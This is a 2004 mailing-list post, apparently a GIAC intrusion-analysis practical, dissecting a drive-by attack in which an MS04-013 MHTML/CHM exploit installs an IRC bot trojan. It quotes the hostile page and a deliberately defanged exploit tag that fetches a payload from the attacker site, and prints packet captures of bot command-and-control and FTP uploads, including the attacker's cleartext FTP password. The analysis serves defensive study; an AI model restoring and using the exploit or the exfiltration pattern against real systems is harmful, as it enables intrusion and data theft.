LOGS: GIAC GCIA Version 3.4 Practical Detect Alva Lease 'Skip' Duckwall IV

This is my second attempt at sending this to the list.  Hopefully it will
go better than the first attempt....

Anyways, My name is Alva Lease 'Skip' Duckwall and here is my first detect
writeup.  Feel free to comment and abuse it as you see fit ;-)

Alva Lease 'Skip' Duckwall IV
CISSP, RHCE, SCSA
---------------------------------------------

1. Source of trace

These detects were captured on a stealth interface connected to a hub.
The DSL modem network port for my home network is also plugged into
that hub so all traffic in and out of the DSL modem was captured.

These traces were captured using 'tcpdump -w (filename) -s0'.

2. Detect was generated by:

This is a reproduction of a compromise that occurred on the network at
work. For various reasons, I was not allowed to use the log data
gathered from work for this detect, so I did the next best thing,
reproduce it as best I could from home under well-controlled
circumstances.  It should be noted that I only proceeded with the home
network option after it was determined that my workplace wasn't going
to take any legal action against the site(s) in question.

Predicated on the above information, I consider this to be a 'lab
generated' detect even though the practical assignment states "It must
be stressed that our definition of a lab generated detect means detects
generated and obtained from completely separated and non-Internet
connected systems."  My VMWARE environment was connected to the
Internet so I could capture the entire attack as part of the
reproduction.

A little history: We were alerted to a problem with the host in
question when a signature fired that detected attempts to join an IRC
server on the Internet. Further investigation of this event indicated
that the host in question was attempting to sign into the remote server
with an IRC nickname of "X-bot17234-29327" where the numbers between
the 'X-bot' portion of the nickname and the dash changed, while the
numbers after the dash did not.  The compromised machine would also
transmit via FTP files to the master server.  Furthermore, the machine
in question would try to connect to the IRC channel and FTP files every
30 minutes with a high degree of accuracy (within 3 seconds).  Further
explanation will be discussed in the 'attack mechanism' portion of this
analysis.

After a thorough examination of all logs available to me as well as all
IDS events for the machine in question, the method used to compromise
the machine was discovered.  I then replicated the event at home and
captured all the packets after it was determined that no legal action
was to be taken against any of the participants.

Both of the servers had been taken offline.

3. Probability source address was spoofed:

The source addresses were not spoofed since all of the traffic was TCP.
However, I believe that both of the hosts involved were compromised.

4. Description of the attack

This attack has two major components.  The first component is an
exploit of the bug described in MS04-013 (as well as CAN-2004-0380)
which allows the second exploit to be downloaded and executed without
user intervention.  The second exploit uses a carefully crafted
Microsoft Compressed Help Manual (CHM file) to execute arbitrary code.
This combination of attacks is popular in many phishing attacks (see
correlations) and in some extreme examples, like the one I provide, it
can lead to compromise of the machine being attacked.

The basic timeline of events is as follows:

1) The user visits an untrusted (or possibly hacked) website which will
open a popup window with the first set of exploit code in it.
2) The first exploit (MS04-013/CAN-2004-0380) downloads the hostile CHM
code to the local machine.
3) The hostile CHM code is executed which will then download the trojan
components.
4) The trojan components are then installed and begins to execute.


5. Attack mechanism

The website that appeared in a popup window was www.news-
distributor.com.

This is the index page from this site:

" <html> <body> <script> var
oWin=window.open("msits.html","Child","width=50, height=50,
screenX,left=5000, screenY,top=5000, menubar=no"); </script> <IMG
src="http://216.55.161.45/cgi-bin/stats/PageStat.pl"; WIDTH="1"
HEIGHT="1">
</body> "

This page opens the http://www.news-distributor.com/msits.html page in
yet another popup window.  It also runs a CGI script that is possibly
used to track information about the users visiting this page.

The contents of http://www.news-distributor.com/msits.html (Please note
that exploit has been obfuscated to prevent detection from any anti-
virus software. It WILL NOT work in its current form. )

" <html> <body onUnload='confirm("Do you want to close this window?")'>
<script> self.moveTo(5000,5000); </script><object data="ms-
its(colon)mhtml(colon)file(colon)//C(colon)\\MAIN.MHT(bang)http://www.n
ews-distributor.com(slash)(slash)main.chm(colon)(colon)/main.htm"
type="text/x-scriptlet"></object> </body> </html> "

This code exploits the vulnerability described in MS04-013/CAN-2004-
0380 to download and execute the chm file at http://www.news-
distributor.com/main.chm.

According to the network detects, the following files were downloaded
from 216.55.161.45: svchost.ini, SVCHOST.EXE, dlcomcnf.exe, url.txt,
and title.txt.

SVCHOST.EXE is the trojan.  A quick look at the binary shows that it
was compressed with UPX.  Further examination of the uncompressed
binary yielded references to it acting as a SOCKS proxy.  There was
also a reference to a slightly different pagestat.pl url named
pagestat2.pl.  Perhaps this second cgi script was put there to gather
some sort of statistics as to the success rate of infection. As of this
writing no major antivirus or anti-spyware software was able to
identify it.  A sample was submitted to Symantec and McAfee.

svchost.ini is the control file for the trojan.  The control file
contains encrypted statements.  More than likely it contains the
information needed to log into the IRC server and the FTP server.

dlcomcnf.exe is a self extracting archive that contains a DLL.

Two text files url.txt and title.txt contain URLs and title keywords
that the trojan looks for. Examples contained in url.txt are
‘dallasfed.org’, ‘ml.com’, and ’jpmorgan.com’.  Examples from title.txt
are ‘bank’, ‘money’, ‘mail’, and ‘log’.

The following detect shows communication from the VMWARE box to
216.55.161.45 on TCP port 34902.  This appears to be IRC traffic.  I
have not shown any of the channel listings since it would give away the
names and IP addresses of compromised machines.  The address has been
obfuscated and the checksums have been changed.

23:12:47.847453 IP 10.10.10.138.1106 > 216.55.161.45.34902: S
3639828070:3639828070(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
23:12:47.924763 IP 216.55.161.45.34902 > 10.10.10.138.1106: S
4063190951:4063190951(0) ack 3639828071 win 5840 <mss
1460,nop,nop,sackOK> (DF)
|23:12:47.925046 IP 10.10.10.138.1106 > 216.55.161.45.34902: . ack 1
win 17520 (DF)
0|3:12:48.937192 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 1:23(22)
ack 1 win 17520 (DF)
0x0000   4500 003e 0409 4000 8006 f6b0 0a0a 0a8a        E..>..@.....E.A.
0x0010   d837 a12d 0452 8856 d8f3 5e67 f22f 5fa8        .7.-.R.V..^g./_.
0x0020   5018 4470 f283 0000 4e49 434b 2058 2d62        P.Dp....NICK.X-b
0x0030   6f74 3939 3238 2d35 3939 3539 0d0a             ot9928-59959..
23:12:49.010010 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 23
win 5840 (DF)

Here the IRC nickname is set to X-bot9928-59959.  It is worth noting
that there was a port listening on the machine 59959 that might be a
SOCKS proxy, since there are references to SOCKS in the binary.

23:12:49.010583 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 23:82(59)
ack 1 win 17520 (DF)
0x0000   4500 0063 040a 4000 8006 f68a 0a0a 0a8a        E..c..@.....E.A.
0x0010   d837 a12d 0452 8856 d8f3 5e7d f22f 5fa8        .7.-.R.V..^}./_.
0x0020   5018 4470 3258 0000 5553 4552 204a 6262        P.Dp2X..USER.Jbb
0x0030   3467 3639 3932 3841 3120 4855 4748 2d38        4g69928A1.HUGH-8
0x0040   4e31 4a41 4a59 4255 5920 7365 7276 6572        N1JAJYBUY.server
0x0050   203a 582d 626f 7439 3932 382d 3539 3935        .:X-bot9928-5995
0x0060   390d 0a                                        9..

 N1JaJYBUY is maybe somebody's name?

23:12:49.086404 IP 216.55.161.45.34902 > 10.10.10.138.1106: . ack 82
win 5840 (DF)
23:12:49.203219 IP 216.55.161.45.34902 > 10.10.10.138.1106: P
1:1067(1066) ack 82 win 5840 (DF)
0x0000   4500 0452 6bca 4000 3706 d3db d837 a12d        E..Rk.@.7....7.-
0x0010   0a0a 0a8a 8856 0452 f22f 5fa8 d8f3 5eb8        E.A..V.R./_...^.
0x0020   5018 16d0 2a84 0000 3a73 6572 7665 722e        P...*...:server.
0x0030   6461 6c2e 6e65 7420 3030 3120 582d 626f        dal.net.001.X-bo
0x0040   7439 3932 382d 3539 3935 3920 3a57 656c        t9928-59959.:Wel
0x0050   636f 6d65 2074 6f20 7468 6520 496e 7465        come.to.the.Inte
0x0060   726e 6574 2052 656c 6179 204e 6574 776f        rnet.Relay.Netwo
0x0070   726b 2058 2d62 6f74 3939 3238 2d35 3939        rk.X-bot9928-599
0x0080   3539 215e 4a62 6234 6736 3939 3240 6464        59!^Jbb4g6992@dd
0x0090   6464 6464 6464 6464 6464 6464 2e64 6464        dddddddddddd.ddd
0x00a0   642e 6464 642e 6464 6464 6464 6464 642e        d.ddd.ddddddddd.
0x00b0   6464 640d 0a3a 7365 7276 6572 2e64 616c        ddd..:server.dal
0x00c0   2e6e 6574 2030 3032 2058 2d62 6f74 3939        .net.002.X-bot99
0x00d0   3238 2d35 3939 3539 203a 596f 7572 2068        28-59959.:Your.h
0x00e0   6f73 7420 6973 2073 6572 7665 722e 6461        ost.is.server.da
0x00f0   6c2e 6e65 742c 2072 756e 6e69 6e67 2052        l.net,.running.R
0x0100   7573 4e65 742d 312e 342e 3270 7265 5f31        usNet-1.4.2pre_1
0x0110   3620 286f 7269 672e 2032 2e31 302e 3370        6.(orig..2.10.3p
0x0120   3529 0d0a 3a73 6572 7665 722e 6461 6c2e        5)..:server.dal.
0x0130   6e65 7420 3030 3320 582d 626f 7439 3932        net.003.X-bot992
0x0140   382d 3539 3935 3920 3a54 6869 7320 7365        8-59959.:This.se
0x0150   7276 6572 2077 6173 2063 7265 6174 6564        rver.was.created
0x0160   2054 7565 204d 6172 2032 2032 3030 3420        .Tue.Mar.2.2004.
0x0170   6174 2032 313a 3530 3a31 3020 5053 540d        at.21:50:10.PST.
0x0180   0a3a 7365 7276 6572 2e64 616c 2e6e 6574        .:server.dal.net
0x0190   2030 3034 2058 2d62 6f74 3939 3238 2d35        .004.X-bot9928-5
0x01a0   3939 3539 2073 6572 7665 722e 6461 6c2e        9959.server.dal.
0x01b0   6e65 7420 322e 3130 2e33 7035 2061 6f4f        net.2.10.3p5.aoO
0x01c0   6972 7778 2061 6263 6569 496b 6c6d 6e6f        irwx.abceiIklmno
0x01d0   4f70 7172 7374 767a 0d0a 3a73 6572 7665        Opqrstvz..:serve
0x01e0   722e 6461 6c2e 6e65 7420 3030 3520 582d        r.dal.net.005.X-
0x01f0   626f 7439 3932 382d 3539 3935 3920 5052        bot9928-59959.PR
0x0200   4546 4958 3d28 6f76 2940 2b20 4d4f 4445        EFIX=(ov)@+.MODE
0x0210   533d 3320 4348 414e 5459 5045 533d 2326        S=3.CHANTYPES=#&
0x0220   212b 204d 4158 4348 414e 4e45 4c53 3d31        !+.MAXCHANNELS=1
0x0230   3020 4e49 434b 4c45 4e3d 3331 2054 4f50        0.NICKLEN=31.TOP
0x0240   4943 4c45 4e3d 3235 3520 4b49 434b 4c45        ICLEN=255.KICKLE
0x0250   4e3d 3235 3520 4e45 5457 4f52 4b3d 5275        N=255.NETWORK=Ru
0x0260   734e 6574 2043 4841 4e4d 4f44 4553 3d62        sNet.CHANMODES=b
0x0270   6549 2c6b 2c6c 2c61 6369 6d6e 7073 7274        eI,k,l,acimnpsrt
0x0280   7a20 3a61 7265 2073 7570 706f 7274 6564        z.:are.supported
0x0290   2062 7920 7468 6973 2073 6572 7665 720d        .by.this.server.
0x02a0   0a3a 7365 7276 6572 2e64 616c 2e6e 6574        .:server.dal.net
0x02b0   2032 3531 2058 2d62 6f74 3939 3238 2d35        .251.X-bot9928-5
0x02c0   3939 3539 203a 5468 6572 6520 6172 6520        9959.:There.are.
0x02d0   3930 3620 7573 6572 7320 616e 6420 3020        906.users.and.0.
0x02e0   7365 7276 6963 6573 206f 6e20 3120 7365        services.on.1.se
0x02f0   7276 6572 730d 0a3a 7365 7276 6572 2e64        rvers..:server.d
0x0300   616c 2e6e 6574 2032 3533 2058 2d62 6f74        al.net.253.X-bot
0x0310   3939 3238 2d35 3939 3539 2034 203a 756e        9928-59959.4.:un
0x0320   6b6e 6f77 6e20 636f 6e6e 6563 7469 6f6e        known.connection
0x0330   730d 0a3a 7365 7276 6572 2e64 616c 2e6e        s..:server.dal.n
0x0340   6574 2032 3534 2058 2d62 6f74 3939 3238        et.254.X-bot9928
0x0350   2d35 3939 3539 2031 3320 3a63 6861 6e6e        -59959.13.:chann
0x0360   656c 7320 666f 726d 6564 0d0a 3a73 6572        els.formed..:ser
0x0370   7665 722e 6461 6c2e 6e65 7420 3235 3520        ver.dal.net.255.
0x0380   582d 626f 7439 3932 382d 3539 3935 3920        X-bot9928-59959.
0x0390   3a49 2068 6176 6520 3930 3620 7573 6572        :I.have.906.user
0x03a0   732c 2030 2073 6572 7669 6365 7320 616e        s,.0.services.an
0x03b0   6420 3020 7365 7276 6572 730d 0a3a 7365        d.0.servers..:se
0x03c0   7276 6572 2e64 616c 2e6e 6574 2032 3635        rver.dal.net.265
0x03d0   2058 2d62 6f74 3939 3238 2d35 3939 3539        .X-bot9928-59959
0x03e0   203a 4375 7272 656e 7420 6c6f 6361 6c20        .:Current.local.
0x03f0   7573 6572 733a 2039 3036 2020 4d61 783a        users:.906..Max:
0x0400   2031 3037 300d 0a3a 7365 7276 6572 2e64        .1070..:server.d
0x0410   616c 2e6e 6574 2032 3636 2058 2d62 6f74        al.net.266.X-bot
0x0420   3939 3238 2d35 3939 3539 203a 4375 7272        9928-59959.:Curr
0x0430   656e 7420 676c 6f62 616c 2075 7365 7273        ent.global.users
0x0440   3a20 3930 3620 204d 6178 3a20 3130 3730        :.906..Max:.1070
0x0450   0d0a                                           ..

This section says that there are 906 users on the system out of 1070.
This seems to indicate that there are at least 900 machines that are
infected with this trojan.  Further analysis of the channel seems to
bear this out.  I'm not including this channel information because it
contains IP addresses and the SOCKS port information.

23:12:49.290751 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 82:99(17)
ack 1067 win 16454 (DF)
0x0000   4500 0039 040c 4000 8006 f6b2 0a0a 0a8a        E..9..@.....E.A.
0x0010   d837 a12d 0452 8856 d8f3 5eb8 f22f 63d2        .7.-.R.V..^../c.
0x0020   5018 4046 ab73 0000 4a4f 494e 203a 2373        P.@xxxxxxxxxx:#s
0x0030   7570 6572 746f 790d 0a                         upertoy..

The channel name is #supertoy.  Perhaps this is the name of the trojan.

Here is some of the FTP traffic.  Please note that this traffic was
captured before the previous IRC traffic.  This traffic is presented
out of order because I felt it was better to present the IRC traffic
first.

22:28:09.964008 10.10.10.138.3604 > 216.55.161.45.ftp: S
535955192:535955192(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)

22:28:10.038087 216.55.161.45.ftp > 10.10.10.138.3604: S
3993608827:3993608827(0) ack 535955193 win 5840 <mss
1460,nop,nop,sackOK>

22:28:10.038414 10.10.10.138.3604 > 216.55.161.45.ftp: . ack 1 win
64240 (DF)

22:28:10.113441 216.55.161.45.ftp > 10.10.10.138.3604: P 1:21(20) ack 1
win 5840 (DF)

22:28:10.114372 10.10.10.138.3604 > 216.55.161.45.ftp: P 1:14(13) ack
21 win 64220 (DF)
0x0000   4500 0035 4f1a 4000 8006 aba8 0a0a 0a8a       E..5O.@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 06f9 ee09 a290       .7.-............
0x0020   5018 fadc f155 0000 5553 4552 2061 7061       P....U..USER.apa
0x0030   6368 650d 0a                                  che..

Username is apache.  He probably logs directly into the webroot for the
machine.

22:28:10.187860 216.55.161.45.ftp > 10.10.10.138.3604: . ack 14 win
5840 (DF)

22:28:10.190064 216.55.161.45.ftp > 10.10.10.138.3604: P 21:55(34) ack
14 win 5840 (DF)
0x0000   4500 004a 70c6 4000 3706 d2e7 d837 a12d       E..Jp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a290 1ff2 0706       E.A.............
0x0020   5018 16d0 8bfd 0000 3333 3120 506c 6561       P.......331.Plea
0x0030   7365 2073 7065 6369 6679 2074 6865 2070       se.specify.the.p
0x0040   6173 7377 6f72 642e 0d0a                      assword...

22:28:10.190827 10.10.10.138.3604 > 216.55.161.45.ftp: P 14:31(17) ack
55 win 64186 (DF)
0x0000   4500 0039 4f1e 4000 8006 aba0 0a0a 0a8a       E..9O.@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 0706 ee09 a2b2       .7.-............
0x0020   5018 faba 62ed 0000 5041 5353 204d 6e37       P...b...PASS.Mn7
0x0030   507a 3431 5f63 6c0d 0a                        Pz41_cl..

A password of “Mn7Pz41_cl”.  I wish I could get my users to use such a
secure password.  Of course it doesn’t help that it was sent in clear
text. ;-)

22:28:10.268202 216.55.161.45.ftp > 10.10.10.138.3604: P 55:88(33) ack
31 win 5840 (DF)
0x0000   4500 0049 70c7 4000 3706 d2e7 d837 a12d       E..Ip.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a2b2 1ff2 0717       E.A.............
0x0020   5018 16d0 6eb8 0000 3233 3020 4c6f 6769       P...n...230.Logi
0x0030   6e20 7375 6363 6573 7366 756c 2e20 4861       n.successful..Ha
0x0040   7665 2066 756e 2e0d 0a                        ve.fun...

22:28:10.269584 10.10.10.138.3604 > 216.55.161.45.ftp: P 31:44(13) ack
88 win 64153 (DF)
0x0000   4500 0035 4f22 4000 8006 aba0 0a0a 0a8a       E..5O"@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 0717 ee09 a2d3       .7.-............
0x0020   5018 fa99 8359 0000 4d4b 4420 746f 796c       P....Y..MKD.toyl
0x0030   6f67 730d 0a                                  ogs..

22:28:10.344596 216.55.161.45.ftp > 10.10.10.138.3604: P 88:128(40) ack
44 win 5840 (DF)
0x0000   4500 0050 70c8 4000 3706 d2df d837 a12d       E..Pp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a2d3 1ff2 0724       E.A............$
0x0020   5018 16d0 338b 0000 3535 3020 4372 6561       P...3...550.Crea
0x0030   7465 2064 6972 6563 746f 7279 206f 7065       te.directory.ope
0x0040   7261 7469 6f6e 2066 6169 6c65 642e 0d0a       ration.failed...

22:28:10.345424 10.10.10.138.3604 > 216.55.161.45.ftp: P 44:57(13) ack
128 win 64113 (DF)
0x0000   4500 0035 4f26 4000 8006 ab9c 0a0a 0a8a       E..5O&@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 0724 ee09 a2fb       .7.-.......$....
0x0020   5018 fa71 8d40 0000 4357 4420 746f 796c       P..q.@..CWD.toyl
0x0030   6f67 730d 0a                                  ogs..

22:28:10.419245 216.55.161.45.ftp > 10.10.10.138.3604: P 128:165(37)
ack 57 win 5840 (DF)
0x0000   4500 004d 70c9 4000 3706 d2e1 d837 a12d       E..Mp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a2fb 1ff2 0731       E.A............1
0x0020   5018 16d0 4724 0000 3235 3020 4469 7265       P...G$..250.Dire
0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...

It attempts to make a directory called ‘toylogs’.  Perhaps supertoy is
the name of the trojan after all.  The directory creation failed
because it already existed.

22:28:10.420113 10.10.10.138.3604 > 216.55.161.45.ftp: P 57:73(16) ack
165 win 64076 (DF)
0x0000   4500 0038 4f2a 4000 8006 ab95 0a0a 0a8a       E..8O*@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 0731 ee09 a320       .7.-.......1....
0x0020   5018 fa4c 5c8a 0000 4d4b 4420 3037 2d30       P..L\...MKD.07-0
0x0030   342d 3230 3034 0d0a                           4-2004..

22:28:10.494411 216.55.161.45.ftp > 10.10.10.138.3604: P 165:205(40)
ack 73 win 5840 (DF)
0x0000   4500 0050 70ca 4000 3706 d2dd d837 a12d       E..Pp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a320 1ff2 0741       E.A............A
0x0020   5018 16d0 3321 0000 3535 3020 4372 6561       P...3!..550.Crea
0x0030   7465 2064 6972 6563 746f 7279 206f 7065       te.directory.ope
0x0040   7261 7469 6f6e 2066 6169 6c65 642e 0d0a       ration.failed...

22:28:10.495175 10.10.10.138.3604 > 216.55.161.45.ftp: P 73:89(16) ack
205 win 64036 (DF)
0x0000   4500 0038 4f2e 4000 8006 ab91 0a0a 0a8a       E..8O.@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 0741 ee09 a348       .7.-.......A...H
0x0020   5018 fa24 666e 0000 4357 4420 3037 2d30       P..$fn..CWD.07-0
0x0030   342d 3230 3034 0d0a                           4-2004..

22:28:10.569571 216.55.161.45.ftp > 10.10.10.138.3604: P 205:242(37)
ack 89 win 5840 (DF)
0x0000   4500 004d 70cb 4000 3706 d2df d837 a12d       E..Mp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a348 1ff2 0751       E.A........H...Q
0x0020   5018 16d0 46b7 0000 3235 3020 4469 7265       P...F...250.Dire
0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...

It tries to create a directory called ’07-04-2004’ or April 7, 2004.
The directory creation again fails because it already exists.  This is
the date I ran and gathered these detects.

22:28:10.570516 10.10.10.138.3604 > 216.55.161.45.ftp: P 89:130(41) ack
242 win 63999 (DF)
0x0000   4500 0051 4f32 4000 8006 ab74 0a0a 0a8a       E..QO2@....tE.A.
0x0010   d837 a12d 0e14 0015 1ff2 0751 ee09 a36d       .7.-.......Q...m
0x0020   5018 f9ff 7173 0000 4d4b 4420 3030 4544       P...qs..MKD.00ED
0x0030   4331 3143 2d38 4132 382d 3436 3146 2d42       C11C-8A28-461F-B
0x0040   4533 3033 3344 4331 3442 3431 3545 350d       E3033DC14B415E5.
0x0050   0a                                             .

22:28:10.646047 216.55.161.45.ftp > 10.10.10.138.3604: P 242:313(71)
ack 130 win 5840 (DF)
0x0000   4500 006f 70cc 4000 3706 d2bc d837 a12d       E..op.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a36d 1ff2 077a       E.A........m...z
0x0020   5018 16d0 b16f 0000 3235 3720 222f 746f       P....o..257."/to
0x0030   796c 6f67 732f 3037 2d30 342d 3230 3034       ylogs/07-04-2004
0x0040   2f30 3045 4443 3131 432d 3841 3238 2d34       /00EDC11C-8A28-4
0x0050   3631 462d 4245 3330 3333 4443 3134 4234       61F-BE3033DC14B4
0x0060   3135 4535 2220 6372 6561 7465 640d 0a         15E5".created..

22:28:10.647366 10.10.10.138.3604 > 216.55.161.45.ftp: P 130:171(41)
ack 313 win 63928 (DF)
0x0000   4500 0051 4f36 4000 8006 ab70 0a0a 0a8a       E..QO6@....pE.A.
0x0010   d837 a12d 0e14 0015 1ff2 077a ee09 a3b4       .7.-.......z....
0x0020   5018 f9b8 7b3e 0000 4357 4420 3030 4544       P...{>..CWD.00ED
0x0030   4331 3143 2d38 4132 382d 3436 3146 2d42       C11C-8A28-461F-B
0x0040   4533 3033 3344 4331 3442 3431 3545 350d       E3033DC14B415E5.
0x0050   0a                                            .

22:28:10.722601 216.55.161.45.ftp > 10.10.10.138.3604: P 313:350(37)
ack 171 win 5840 (DF)
0x0000   4500 004d 70cd 4000 3706 d2dd d837 a12d       E..Mp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a3b4 1ff2 07a3       E.A.............
0x0020   5018 16d0 45f9 0000 3235 3020 4469 7265       P...E...250.Dire
0x0030   6374 6f72 7920 7375 6363 6573 7366 756c       ctory.successful
0x0040   6c79 2063 6861 6e67 6564 2e0d 0a              ly.changed...

It was successful at creating a directory called ‘00EDC11C-8A28-461F-
BE3033DC14B415E5’.  This appears to be some sort of unique identifier.
I could not find it in a registry search, so I don’t know how this is
generated.


22:28:10.723883 10.10.10.138.3604 > 216.55.161.45.ftp: P 171:179(8) ack
350 win 63891 (DF)
0x0000   4500 0030 4f3a 4000 8006 ab8d 0a0a 0a8a       E..0O:@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 07a3 ee09 a3d9       .7.-............
0x0020   5018 f993 1c9d 0000 5459 5045 2049 0d0a       P.......TYPE.I..

22:28:10.797750 216.55.161.45.ftp > 10.10.10.138.3604: P 350:381(31)
ack 179 win 5840 (DF)
0x0000   4500 0047 70ce 4000 3706 d2e2 d837 a12d       E..Gp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a3d9 1ff2 07ab       E.A.............
0x0020   5018 16d0 9b6b 0000 3230 3020 5377 6974       P....k..200.Swit
0x0030   6368 696e 6720 746f 2042 696e 6172 7920       ching.to.Binary.
0x0040   6d6f 6465 2e0d 0a                             mode...

22:28:10.798944 10.10.10.138.3604 > 216.55.161.45.ftp: P 179:185(6) ack
381 win 63860 (DF)
0x0000   4500 002e 4f3e 4000 8006 ab8b 0a0a 0a8a       E...O>@.....E.A.
0x0010   d837 a12d 0e14 0015 1ff2 07ab ee09 a3f8       .7.-............
0x0020   5018 f974 3de7 0000 5041 5356 0d0a            P..t=...PASV..

22:28:10.872987 216.55.161.45.ftp > 10.10.10.138 3604: P 381:431(50)
ack 185 win 5840 (DF)
0x0000   4500 005a 70cf 4000 3706 d2ce d837 a12d       E..Zp.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a3f8 1ff2 07b1       E.A.............
0x0020   5018 16d0 4377 0000 3232 3720 456e 7465       P...Cw..227.Ente
0x0030   7269 6e67 2050 6173 7369 7665 204d 6f64       ring.Passive.Mod
0x0040   6520 2832 3136 2c35 352c 3136 312c 3435       e.(216,55,161,45
0x0050   2c36 352c 3232 3729 0d0a                      ,65,227)..

22:28:10.948186 10.10.10.138.3604 > 216.55.161.45.ftp: P 185:215(30)
ack 431 win 63810 (DF)
0x0000   4500 0046 4f44 4000 8006 ab6d 0a0a 0a8a       E..FOD@....mE.A.
0x0010   d837 a12d 0e14 0015 1ff2 07b1 ee09 a42a       .7.-...........*
0x0020   5018 f942 bae3 0000 5354 4f52 2030 372d       P..B....STOR.07-
0x0030   3034 2d32 3030 342d 3135 2d32 332d 3238       04-2004-15-23-28
0x0040   2e74 7874 0d0a                                .txt..


It uploads a file called 07-04-2004-15-23-28.txt.  As previously
mentioned, 07-04-2004 is April 7, 2004.  15-23-28 is the local time
expressed in GMT.  The VMWARE machine’s internal clock was set to
Mountain Time, while the capture machine was set to Eastern Time.

22:28:11.022498 216.55.161.45.ftp > 10.10.10.138.3604: P 431:453(22)
ack 215 win 5840 (DF)
0x0000   4500 003e 70d0 4000 3706 d2e9 d837 a12d       E..>p.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a42a 1ff2 07cf       E.A........*....
0x0020   5018 16d0 be97 0000 3135 3020 4f6b 2074       P.......150.Ok.t
0x0030   6f20 7365 6e64 2064 6174 612e 0d0a            o.send.data...

22:28:11.097441 216.55.161.45.ftp > 10.10.10.138.3604: P 453:475(22)
ack 215 win 5840 (DF)
0x0000   4500 003e 70d1 4000 3706 d2e8 d837 a12d       E..>p.@.7....7.-
0x0010   0a0a 0a8a 0015 0e14 ee09 a440 1ff2 07cf       E.A........@....
0x0020   5018 16d0 db64 0000 3232 3620 4669 6c65       P....d..226.File
0x0030   2072 6563 6569 7665 204f 4b2e 0d0a            .receive.OK...

This was all the data that was sent.  Apparently it hadn’t collected
anything interesting to send home on my test system.


6. Correlations

The vulnerability information can be found from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx.

The CVE for CAN-2004-0380 can be found at http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=CAN-2004-0380

A quick look through the Handler’s diaries at isc.sans.org came up with
a couple of blurbs on hostile chm files. Both
http://isc.sans.org/diary.php?date=2004-04-11 and
http://isc.sans.org/diary.php?date=2004-04-10 mention the hostile
URL/chm files although no in-depth analysis was provided or linked to.

A Google search for ‘supertoy’ and ‘trojan’ yielded references to a
‘W32/Mooder’ trojan from McAfee.  However, the description of the
trojan doesn’t match the files that were downloaded and installed.

A Google search for ‘xbot’ and ‘trojan’ yielded a couple of hits.  One
on pestpatrol, which has a listing for “Backdoor.IRC.XBot.a” and
another on emsisoft.com which also lists a “Backdoor.IRC.Xbot.a”.
Neither of these contain any detailed information or writeups.

A google search for ‘main.chm’ and ‘trojan’ yielded several hits
describing phishing emails that were sent out using this file name.
None of the hits seem to describe the trojan presented here.  Links
include:
http://www.codephish.info/modules.php?op=modload&name=News&file=article
&sid=113
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=
article&sid=121

A search of the websites for both McAfee and Symantec yielded no
results.

A search of the TrendMicro website yielded a couple of hits but neither
of these IRC bots match the description of what I’ve seen.

7. Evidence of active targeting

There is no evidence of active targeting.

8. Severity

Severity = (criticality + lethality) - (system countermeasures +
network countermeasures)

Criticality:
Since this was a VMWARE box whose sole existence was predicated on
running this trojan, the criticality is 1.

Lethality:
Since this trojan appears to offer remote access to somebody on an IRC
channel, this box is about as owned as it gets. Therefore, the
lethality is a 5.

System Countermeasures:
Since this box didn’t have any updates installed on it or any antivirus
software, its score in this area is a 1.

Network Countermeasures:
There were not any network countermeasures in place. Score a 1 here.

Severity = (1 + 5) – ( 1 + 1 ) = 4


9. Defensive recommendation

Always keep the systems patch level up to date.  A current patchset
would have prevented the URL from downloading the hostile CHM file and
subsequently prevented the trojan from being installed.

Also up-to-date antivirus software would have correctly identified the
website as having malicious code on it (verified with both McAfee and
Symantec) and prevented the webpage from working.

Passing all web traffic through an application proxy that was capable
of screening for the hostile CHM URL format would also have prevented
the attack from being successful.

10. Multiple choice Question

Your IDS alerts you that a machine on your network is attempting to FTP
files whose name appears to be some sort of timestamp. Your site
doesn’t have a policy when it comes to transferring files out of your
network.  Should you

A)      Call the networking group and have the machine disconnected
immediately?
B)      Block the destination host at the firewall?
C)      Call the system’s owner and verify it is authorized activity?
D)      All of the above.

Answer: C. Unless you are absolutely certain that the activity is
hostile, you should call the system’s owner to verify that the activity
is NOT authorized, especially since your site doesn’t have a policy on
the subject.  You never know if a machine outside of your control is
supposed to be sending periodic files to a remote server unless you
verify first.

_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions